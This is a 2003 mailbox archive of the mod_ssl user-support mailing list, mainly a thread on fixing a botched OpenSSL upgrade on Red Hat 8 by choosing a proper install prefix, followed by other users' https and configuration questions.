Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have just got an email from another user of RH8 which has the same
problem. I have told him to post it on the list. So looks like there is
a problem.

Sasa

On 2/8/2003 12:48 AM, Geoff Thorpe a écrit:
> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
>> No, It doesn't. I have compiled it with prefix /usr/include and
>> openssldir /usr/include/openssl and there are no headers. I haven't
>> noticed it on first but when I wanted to compile apache with mod_ssl it
>> returns an error that it was unable to find headers for ssl.
>> Is there someone else reporting the same problem ? Maybe is this related
>> to the RedHat8 distrubution only.
> 
> Well RH8 has openssl bundled though probably not with the headers, and I
> can't say much else about what RH might be doing because I don't use it.
> However, trying to install to a prefix of /usr/include would be pretty
> terrible - as it will install all binaries, libraries, and include files
> in *sub-directories* of /usr/include! Are you sure you did this, or did
> you mean /usr/local?
> 
> Anyway, I'd be interested to see a log of this problem if you wouldn't
> mind? If there's an openssl bug inside it, I'll try and get it
> identified and fixed for the next release (0.9.7a). Eg. could you please
> repeat your steps and send me the logs as;
>   # ./config [...] 1> c1.log 2> c2.log
>   # make [...] 1> m1.log 2> m2.log
>   # make install 1> i1.log 2> i2.log
> or something like that?
> 
> Cheers,
> Geoff
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 10:21:59 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3D2D42AA0A7; Sat,  8 Feb 2003 10:21:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from malecot.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id 97C4E2AA087
	for ; Sat,  8 Feb 2003 10:21:57 +0100 (CET)
X-AuthUser: sasa@stupar.homelinux.net
Received: from stupar.homelinux.net (192.168.10.1)
	by malecot.homelinux.net (192.168.10.10) with [XMail 1.12 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Sat, 08 Feb 2003 10:22:06 +0100
Message-ID: <3E44CC3D.9050404@stupar.homelinux.net>
Date: Sat, 08 Feb 2003 10:22:05 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01 (Compact)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se> <3E437E9F.6000209@stupar.homelinux.net> <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net> <20030207234807.GA3189@grumpy.geoffnet>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have forgot...Original instalation of RH8 has openssl in
/usr/include/openssl and there are all the headers. Since this is a
version 0.9.6.b I have decided to upgrade. I have made
prefix=/usr/include and openssldir=/usr/include/openssl. So after the
instalation it put the binary dir to /usr/include and to the
/usr/include/openssl dirs apps, lib,etc. In /usr/include there are no
headers so I have manually copy them to /usr/include/openssl.

On 2/8/2003 12:48 AM, Geoff Thorpe a écrit:
> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
>> No, It doesn't. I have compiled it with prefix /usr/include and
>> openssldir /usr/include/openssl and there are no headers. I haven't
>> noticed it on first but when I wanted to compile apache with mod_ssl it
>> returns an error that it was unable to find headers for ssl.
>> Is there someone else reporting the same problem ? Maybe is this related
>> to the RedHat8 distrubution only.
> 
> Well RH8 has openssl bundled though probably not with the headers, and I
> can't say much else about what RH might be doing because I don't use it.
> However, trying to install to a prefix of /usr/include would be pretty
> terrible - as it will install all binaries, libraries, and include files
> in *sub-directories* of /usr/include! Are you sure you did this, or did
> you mean /usr/local?
> 
> Anyway, I'd be interested to see a log of this problem if you wouldn't
> mind? If there's an openssl bug inside it, I'll try and get it
> identified and fixed for the next release (0.9.7a). Eg. could you please
> repeat your steps and send me the logs as;
>   # ./config [...] 1> c1.log 2> c2.log
>   # make [...] 1> m1.log 2> m2.log
>   # make install 1> i1.log 2> i2.log
> or something like that?
> 
> Cheers,
> Geoff
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 12:23:27 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 363262AA0AB; Sat,  8 Feb 2003 12:23:27 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from malecot.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id F1FD12AA0A5
	for ; Sat,  8 Feb 2003 12:23:22 +0100 (CET)
X-AuthUser: sasa@stupar.homelinux.net
Received: from stupar.homelinux.net (192.168.10.1)
	by malecot.homelinux.net (192.168.10.10) with [XMail 1.12 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Sat, 08 Feb 2003 12:23:31 +0100
Message-ID: <3E44E8B3.7050106@stupar.homelinux.net>
Date: Sat, 08 Feb 2003 12:23:31 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01 (Compact)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se> <3E437E9F.6000209@stupar.homelinux.net> <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net> <20030207234807.GA3189@grumpy.geoffnet> <3E44CC3D.9050404@stupar.homelinux.net>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ok, I have found the problem. If you want to have files in the same
directories as original instalation of RH8 you have to use "./config
--prefix=/usr". Sorry for that confusion. It is the distribution which
is strange.

Sasa

On 2/8/2003 10:22 AM, Sasa STUPAR a écrit:
> I have forgot...Original instalation of RH8 has openssl in
> /usr/include/openssl and there are all the headers. Since this is a
> version 0.9.6.b I have decided to upgrade. I have made
> prefix=/usr/include and openssldir=/usr/include/openssl. So after the
> instalation it put the binary dir to /usr/include and to the
> /usr/include/openssl dirs apps, lib,etc. In /usr/include there are no
> headers so I have manually copy them to /usr/include/openssl.
> 
> On 2/8/2003 12:48 AM, Geoff Thorpe a écrit:
>> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
>>> No, It doesn't. I have compiled it with prefix /usr/include and
>>> openssldir /usr/include/openssl and there are no headers. I haven't
>>> noticed it on first but when I wanted to compile apache with mod_ssl it
>>> returns an error that it was unable to find headers for ssl.
>>> Is there someone else reporting the same problem ? Maybe is this related
>>> to the RedHat8 distrubution only.
>> 
>> Well RH8 has openssl bundled though probably not with the headers, and I
>> can't say much else about what RH might be doing because I don't use it.
>> However, trying to install to a prefix of /usr/include would be pretty
>> terrible - as it will install all binaries, libraries, and include files
>> in *sub-directories* of /usr/include! Are you sure you did this, or did
>> you mean /usr/local?
>> 
>> Anyway, I'd be interested to see a log of this problem if you wouldn't
>> mind? If there's an openssl bug inside it, I'll try and get it
>> identified and fixed for the next release (0.9.7a). Eg. could you please
>> repeat your steps and send me the logs as;
>>   # ./config [...] 1> c1.log 2> c2.log
>>   # make [...] 1> m1.log 2> m2.log
>>   # make install 1> i1.log 2> i2.log
>> or something like that?
>> 
>> Cheers,
>> Geoff
>> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 19:08:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 79F2F2AA0A7; Sat,  8 Feb 2003 19:08:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR004.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id C8D222AA087
	for ; Sat,  8 Feb 2003 19:08:19 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.229.101])
 by VL-MS-MR004.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HA000E0L548TB@VL-MS-MR004.sc1.videotron.ca> for
 modssl-users@modssl.org; Sat, 08 Feb 2003 13:09:46 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Sat,
 08 Feb 2003 13:08:15 -0500
Date: Sat, 08 Feb 2003 13:08:15 -0500
From: Geoff Thorpe 
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
In-reply-to: <3E44E8B3.7050106@stupar.homelinux.net>
To: modssl-users@modssl.org
Message-id: <20030208180815.GA1852@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <3E422196.40803@unit.liu.se>
 <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se>
 <3E437E9F.6000209@stupar.homelinux.net>
 <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net>
 <20030207234807.GA3189@grumpy.geoffnet>
 <3E44CC3D.9050404@stupar.homelinux.net> <3E44E8B3.7050106@stupar.homelinux.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
> Ok, I have found the problem. If you want to have files in the same
> directories as original instalation of RH8 you have to use "./config
> --prefix=/usr". Sorry for that confusion. It is the distribution which
> is strange.

Phew, I was starting to wonder what I was missing here :-) As I
mentioned originally, using "/usr/include" as an installation prefix
doesn't make sense because it will create the standard {include,bin,man}
tree beneath that and install. Hence "/usr" or "/usr/local" make more
sense. Also, especially on package management systems like RH, you're
better not to simply install *over* existing files, particularly as a
newer version of openssl may have removed headers that were in a
previous version, so the old ones will end up mixed up with the new
ones. And of course if a bug-fix release is made by RH to the older
version, eg. 0.9.6x, that could seriously screw things up if you'd
installed 0.9.7 over the top. It could also totally mangle your system's
RPM database, and various other carnage is possible.

The solution is to either grapple with RH's dependencies to try and
build a replacement openssl RPM from source to upgrade to (which many
will tell you is an only slightly less difficult problem than the
alchemy of gold itself) or to install openssl elsewhere and make sure
your system paths are organised appropriately. Eg. you could use
/usr/local or /opt as a place to manually install packages such as a
newer openssl, and make sure that the bin subdirectory is earlier in
PATH than /usr/bin, ditto for the lib subdirectory in /etc/ld.so.conf,
the man subdirectory in /etc/man.config, and so on ...

BTW: You should check your /usr/include tree that there aren't bits and
pieces of openssl cruft in there left over from your previous efforts -
eg. your previous installation attempts probably created weird
directories like /usr/include/bin, /usr/include/include, etc.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 19:13:23 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 647982AA0A7; Sat,  8 Feb 2003 19:13:23 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from malecot.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id 910692AA087
	for ; Sat,  8 Feb 2003 19:13:21 +0100 (CET)
X-AuthUser: sasa@stupar.homelinux.net
Received: from stupar.homelinux.net (192.168.10.1)
	by malecot.homelinux.net (192.168.10.10) with [XMail 1.12 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Sat, 08 Feb 2003 19:13:31 +0100
Message-ID: <3E4548CB.6000908@stupar.homelinux.net>
Date: Sat, 08 Feb 2003 19:13:31 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01 (Compact)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
References: <3E422196.40803@unit.liu.se> <20030206191825.GC1848@grumpy.geoffnet> <3E437B9F.5090208@unit.liu.se> <3E437E9F.6000209@stupar.homelinux.net> <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net> <20030207234807.GA3189@grumpy.geoffnet> <3E44CC3D.9050404@stupar.homelinux.net> <3E44E8B3.7050106@stupar.homelinux.net> <20030208180815.GA1852@grumpy.geoffnet>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Prior to the instalation I have manually removed old version of Openssl
and other dirs from my previous installs and I have no
problem...everything works well.

Thanks for info.

Sasa

On 2/8/2003 7:08 PM, Geoff Thorpe a écrit:
> * Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
>> Ok, I have found the problem. If you want to have files in the same
>> directories as original instalation of RH8 you have to use "./config
>> --prefix=/usr". Sorry for that confusion. It is the distribution which
>> is strange.
> 
> Phew, I was starting to wonder what I was missing here :-) As I
> mentioned originally, using "/usr/include" as an installation prefix
> doesn't make sense because it will create the standard {include,bin,man}
> tree beneath that and install. Hence "/usr" or "/usr/local" make more
> sense. Also, especially on package management systems like RH, you're
> better not to simply install *over* existing files, particularly as a
> newer version of openssl may have removed headers that were in a
> previous version, so the old ones will end up mixed up with the new
> ones. And of course if a bug-fix release is made by RH to the older
> version, eg. 0.9.6x, that could seriously screw things up if you'd
> installed 0.9.7 over the top. It could also totally mangle your system's
> RPM database, and various other carnage is possible.
> 
> The solution is to either grapple with RH's dependencies to try and
> build a replacement openssl RPM from source to upgrade to (which many
> will tell you is an only slightly less difficult problem than the
> alchemy of gold itself) or to install openssl elsewhere and make sure
> your system paths are organised appropriately. Eg. you could use
> /usr/local or /opt as a place to manually install packages such as a
> newer openssl, and make sure that the bin subdirectory is earlier in
> PATH than /usr/bin, ditto for the lib subdirectory in /etc/ld.so.conf,
> the man subdirectory in /etc/man.config, and so on ...
> 
> BTW: You should check your /usr/include tree that there aren't bits and
> pieces of openssl cruft in there left over from your previous efforts -
> eg. your previous installation attempts probably created weird
> directories like /usr/include/bin, /usr/include/include, etc.
> 
> Cheers,
> Geoff
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Feb  8 19:59:07 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EBBB32AA0A7; Sat,  8 Feb 2003 19:59:06 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR004.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 886B02AA087
	for ; Sat,  8 Feb 2003 19:59:05 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.203.229.101])
 by VL-MS-MR004.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HA000E3U7GTTB@VL-MS-MR004.sc1.videotron.ca> for
 modssl-users@modssl.org; Sat, 08 Feb 2003 14:00:31 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Sat,
 08 Feb 2003 13:59:01 -0500
Date: Sat, 08 Feb 2003 13:59:01 -0500
From: Geoff Thorpe 
Subject: Re: Problems compiling mod_ssl with apache 2.0.44
In-reply-to: <3E4548CB.6000908@stupar.homelinux.net>
To: modssl-users@modssl.org
Message-id: <20030208185901.GD1852@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
References: <20030206191825.GC1848@grumpy.geoffnet>
 <3E437B9F.5090208@unit.liu.se> <3E437E9F.6000209@stupar.homelinux.net>
 <20030207181743.GB1847@grumpy.geoffnet> <3E44020E.70901@stupar.homelinux.net>
 <20030207234807.GA3189@grumpy.geoffnet>
 <3E44CC3D.9050404@stupar.homelinux.net>
 <3E44E8B3.7050106@stupar.homelinux.net>
 <20030208180815.GA1852@grumpy.geoffnet> <3E4548CB.6000908@stupar.homelinux.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

* Sasa STUPAR (sasa@stupar.homelinux.net) wrote:
> Prior to the instalation I have manually removed old version of Openssl
> and other dirs from my previous installs and I have no
> problem...everything works well.

Really? I'm surprised, but happy. RH typically build everything with
shared-library dependencies on openssl libs, so either you're running no
openssl-dependant software, or you're getting "lucky" with software
built for 0.9.6 linking with 0.9.7 ... eg. ssh is possibly doing this.
Anyway, I leave you and RH to get along with one another in whatever
manner suits you both :-)

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb  9 11:40:02 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 276E92AA0B0; Sun,  9 Feb 2003 11:40:02 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail22.messagelabs.com (mail22.messagelabs.com [193.109.255.115])
	by master.modssl.org (Postfix) with SMTP id 020E72AA065
	for ; Sun,  9 Feb 2003 11:40:01 +0100 (CET)
X-VirusChecked: Checked
X-Env-Sender: jnc@empolis.co.uk
X-Msg-Ref: server-8.tower-22.messagelabs.com!1044787237!834
Received: (qmail 21059 invoked from network); 9 Feb 2003 10:40:37 -0000
Received: from smtp-2.star.net.uk (212.125.75.71)
  by server-8.tower-22.messagelabs.com with SMTP; 9 Feb 2003 10:40:37 -0000
Received: (qmail 30935 invoked from network); 9 Feb 2003 10:39:05 -0000
Received: from unknown (HELO hendrix.empolisuk.com) (195.216.13.189)
  by smtp-2.star.net.uk with SMTP; 9 Feb 2003 10:39:05 -0000
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: base64
Subject: tried everything on linux but SSL will not work
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Date: Sun, 9 Feb 2003 10:37:20 -0000
Message-ID: <8FC4E7C302A6A64AAD5DB1FA0E825DEB44AC38@hendrix.empolisuk.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: tried everything on linux but SSL will not work
Thread-Index: AcLQJzjoJbXcTBX6TCeB9kYqcVgGDg==
From: "Julian Cowell" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Julian Cowell" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

RGVhciBUZWFtLA0KIA0KSSBoYXZlIHRyaWVkIFJITCA3LjMgYW5kIDguMCAgYW5kIE1hbmRyYWtl
IDkuMCwgKHRoZXNlIGFyZSBhbGwgZnJlc2ggaW5zdGFsbHRpb25zKQ0KVGhlIGluc3RhbGxhdGlv
biBwcm9jZXNzIGlzIGZpbmUgYW5kIGh0dHAgd29ya3MgT0suIA0KSSBjYW50IGdldCBhbnkgaHR0
cHMgd29ya2luZyBhdCBhbGwgd2l0aCBhbnkgY29uZmlndXJhdGlvbi4gQXMgYSBzYW5pdHkgY2hl
Y2sgSSBpbnN0YWxsZWQgdGhlIElCTSBoaHRwIHNlcnZlciBhbmQgYWdhaW4gdGhpcyB3b3JrcyBm
aW5lIGZvciBodHRwLCB0aGUgSWtleW1hbiB3b3JrcyBmaW5lIGFuZCBtYWtlcyBrZXlzIGJ1dCBz
dGlsbCBubyBqb3kgd2l0aCBodHRwcy4NClRoZSBvbmx5IGNsdWVzIEkgaGF2ZSBpcyB0aGF0IHRo
ZSBtb3ppbGxhIGJyb3dzZXIgcmV0dXJucyBhIGVycm9yIGNvZGUgb2YgIDgxODIgLiBOb3RoaW5n
IHdvcmtzIGZvciBJRSBvciBOZXRzY2FwZSwgaXQganVzdCBoYW5ncy4NCklzIHRoZXJlIGFueSBy
ZWFsIGJhc2ljcyBJJ20gbWlzc2luZyBoZXJlID8sIGUuZy4gaG9zdHMgZmlsZSBjb25maWcsIGV0
Yz8NCiANClRoYW5rcyBKdWxpYW4NCiANCgoKX19fX19fX19fX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fClRoaXMgbWVzc2FnZSBoYXMg
YmVlbiBjaGVja2VkIGZvciBhbGwga25vd24gdmlydXNlcyBieSB0aGUgTWVzc2FnZUxhYnMgVmly
dXMgU2Nhbm5pbmcgU2VydmljZS4K
====
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Feb  9 22:29:27 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4F7842AA0B3; Sun,  9 Feb 2003 22:29:27 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.sancho2k.net (spruell.dsl.xmission.com [166.70.24.187])
	by master.modssl.org (Postfix) with SMTP id 5FAE52AA0AF
	for ; Sun,  9 Feb 2003 22:29:24 +0100 (CET)
Received: (qmail 30441 invoked from network); 9 Feb 2003 21:31:47 -0000
Received: from win2kpro.sancho2k.net (HELO sancho2k.net) (10.0.0.3)
  by 0 with SMTP; 9 Feb 2003 21:31:47 -0000
Message-ID: <3E46CBB6.50803@sancho2k.net>
Date: Sun, 09 Feb 2003 14:44:22 -0700
From: "Sancho2k.net Lists" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01
X-Accept-Language: en-us, en, ru
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: tried everything on linux but SSL will not work
References: <8FC4E7C302A6A64AAD5DB1FA0E825DEB44AC38@hendrix.empolisuk.com>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sancho2k.net Lists" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Julian Cowell wrote:
> Dear Team,
>  
> I have tried RHL 7.3 and 8.0  and Mandrake 9.0, (these are all fresh installtions)
> The installation process is fine and http works OK. 
> I cant get any https working at all with any configuration. As a sanity check I installed the IBM hhtp server and again this works fine for http, the Ikeyman works fine and makes keys but still no joy with https.
> The only clues I have is that the mozilla browser returns a error code of  8182 . Nothing works for IE or Netscape, it just hangs.
> Is there any real basics I'm missing here ?, e.g. hosts file config, etc?
>  
> Thanks Julian

Despite the fact that you've given no details about your intentions, or 
problem, or anything, no, you're not missing any real basics.

Try filling us in a bit more.

DS

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 03:50:16 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8F1DB2AA0B4; Mon, 10 Feb 2003 03:50:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from blount.mail.mindspring.net (blount.mail.mindspring.net [207.69.200.226])
	by master.modssl.org (Postfix) with ESMTP id 7F5D42AA065
	for ; Mon, 10 Feb 2003 03:49:56 +0100 (CET)
Received: from h-69-3-106-129.nycmny83.covad.net ([69.3.106.129] helo=deephole)
	by blount.mail.mindspring.net with smtp (Exim 3.33 #1)
	id 18i414-0000M2-00
	for modssl-users@modssl.org; Sun, 09 Feb 2003 21:49:54 -0500
Message-ID: <002d01c2d0af$13a32b70$6401a8c0@deephole>
From: "Jan Cohen" 
To: 
Subject: cgi-bin broken lock
Date: Sun, 9 Feb 2003 21:49:48 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jan Cohen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I've got ssl up and running on a test page that calls a script in cgi-bin.
Lock is there, everything works.  When I parse the info from that page to a
script in the cgi-bin, that script creates the https page and some of the
ssl functionality seems to work (at least the page is being created).
Unfortunately, the script creates a page with a broken lock and I can't
figure out why.

I don't have access to the httpd.conf, but my host tells me ssl is enabled
for the root dn, and that the cgi-bin was added to the ssl section of the
httpd.conf.  Would anyone have some suggestions I might be able to check
out?

Thanks for your help,

Jan Cohen

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 04:29:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C1F92AA0B4; Mon, 10 Feb 2003 04:29:25 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from typhoon.enabled.com (typhoon.enabled.com [216.218.248.34])
	by master.modssl.org (Postfix) with ESMTP id 768B82AA087
	for ; Mon, 10 Feb 2003 04:29:06 +0100 (CET)
Received: from localhost (localhost.enabled.com [127.0.0.1])
	by typhoon.enabled.com (8.12.7/8.12.7) with ESMTP id h1A3S1K0080788
	for ; Sun, 9 Feb 2003 19:28:02 -0800 (PST)
	(envelope-from sleek@enabled.com)
Date: Sun, 9 Feb 2003 19:28:01 -0800 (PST)
From: Noah Garrett Wallach 
To: modssl-users@modssl.org
Subject: freebsd configuration file
Message-ID: <20030209192632.Q80779@typhoon.enabled.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Noah Garrett Wallach 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users




does anybody know where I can find a simple freebsd + apache 1.3.27 modssl
configuration file?  I have a single hostname and just need to setup a
certificate for handling openwebmail and keeping passwords encrypted.
Having a Little bit of a difficulty getting this set up right now.

help is appreaciated in advance.

- Noah

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Feb 10 09:47:40 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B4FCA2AA0B4; Mon, 10 Feb 2003 09:47:40 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id DAC7B2AA0B3
	for ; Mon, 10 Feb 2003 09:47:34 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h1A8lWFY002873
	for ; Mon, 10 Feb 2003 09:47:32 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h1A8lV2M010202
